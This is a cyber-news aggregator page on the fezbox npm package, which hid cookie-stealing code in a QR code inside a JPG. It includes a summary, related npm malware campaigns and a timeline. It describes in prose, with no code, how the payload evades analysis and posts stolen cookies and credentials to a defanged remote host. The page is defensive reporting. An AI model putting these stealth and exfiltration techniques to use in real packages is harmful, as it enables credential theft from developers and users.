Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Fezbox QR-code cookie-stealing malware activity

Malware Activity
First reported
Last updated
Happening score
H score 22
2 unique sources, 2 articles

Summary

Hide ▲

The fezbox npm package was found delivering cookie-stealing malware through a QR code hidden in a JPG, creating a supply-chain risk for JavaScript and Node.js users. The payload reads document.cookie, extracts usernames and passwords, and exfiltrates them to a remote Railway host over HTTPS. Socket Threat Research identified the package on npmjs.com, and the package was later removed and flagged as malware after at least 327 downloads.

Related Happenings

LofyGang Minecraft LofyStealer campaign

Campaign
First: 28.04.2026 20:39 Last: 28.04.2026 20:39 Sources 1

About this happening: The **LofyGang** crew has re-emerged with a **Minecraft-player targeting** operation that uses **LofyStealer (GrabBot)**, increasing the risk of **credential and payment-data thef...

Open Happening

PhantomRaven malicious npm package waves

Malware Activity
First: 11.03.2026 19:09 Last: 11.03.2026 19:09 Sources 1

About this happening: The **PhantomRaven** malware operation is still pushing malicious **npm packages** into the **npm registry**, keeping the risk of developer-machine compromise and data theft activ...

Open Happening

IndonesianFoods self-replicating npm spam campaign

Campaign
First: 13.11.2025 06:58 Last: 13.11.2025 06:58 Sources 1

About this happening: The **IndonesianFoods** campaign has published **46,484 fake npm packages** since **early 2024**, flooding the **npm registry** and creating **supply-chain risk** for developers....

Open Happening

MUT-4831 Vidar Stealer npm supply-chain campaign

Campaign
First: 07.11.2025 08:48 Last: 07.11.2025 08:48 Sources 1

About this happening: A **MUT-4831** supply-chain campaign pushed **17 npm packages** that masqueraded as SDKs and silently delivered **Vidar Stealer**, expanding theft risk through the **npm registry*...

Open Happening

Socket Threat Research deconstructs fezbox QR-steganography and cookie-stealing payload

Technical Analysis
First: 24.09.2025 11:55 Last: 24.09.2025 11:55 Sources 1

How related: When trying to deconstruct the code, the Socket Threat Research team found several layers of obsfuscation — reversed string, the QR code itself, and an obfuscated payload, before they could examine the payload code itself.

About this happening: **Socket Threat Research** deconstructed the malicious **fezbox** package and uncovered **QR-code steganography** plus layered obfuscation that hid **cookie-stealing code**, raisi...

Open Happening

Timeline

  1. 23.09.2025 13:42 2 articles · 8mo ago

    fezbox QR-code payload steals cookies and credentials

    Technical Analysis Update

    The fezbox npm package uses hidden instructions to fetch a JPG containing a QR code, waits 120 seconds, then parses obfuscated code to read document.cookie, extract username and password, and send the stolen data via HTTPS POST to https://my-nest-app-production[.]up[.]railway[.]app/users. The code also stores the Cloudinary image URL in reverse and checks for a development environment before running, which is a stealth tactic to avoid analysis.

    Show sources
    Open in new tab
  2. 23.09.2025 13:42 2 articles · 8mo ago

    Socket identifies the malicious npm package fezbox

    Initial Disclosure

    Socket Threat Research Team identified a malicious npm package named fezbox on npmjs.com, and BleepingComputer confirmed the payload in dist/fezbox.cjs version 1.3.0. The package had at least 327 downloads before npmjs.com removed it.

    Show sources
    Open in new tab